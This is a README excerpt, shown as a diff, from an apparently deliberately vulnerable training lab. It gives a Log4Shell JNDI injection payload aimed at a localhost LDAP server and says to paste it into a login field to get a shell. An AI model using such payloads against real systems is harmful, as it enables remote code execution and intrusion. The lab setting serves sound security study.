joimb9064/vulnerable-lab/README.md

 ```
 Once it is running, you can access it on localhost:8080

 Copy the payload ${jndi:ldap://localhost:1389/a} and paste it in the username field of the vulnerable site.
+Click on the Login button to pop a shell.

 # Samba config
 ## Create Users password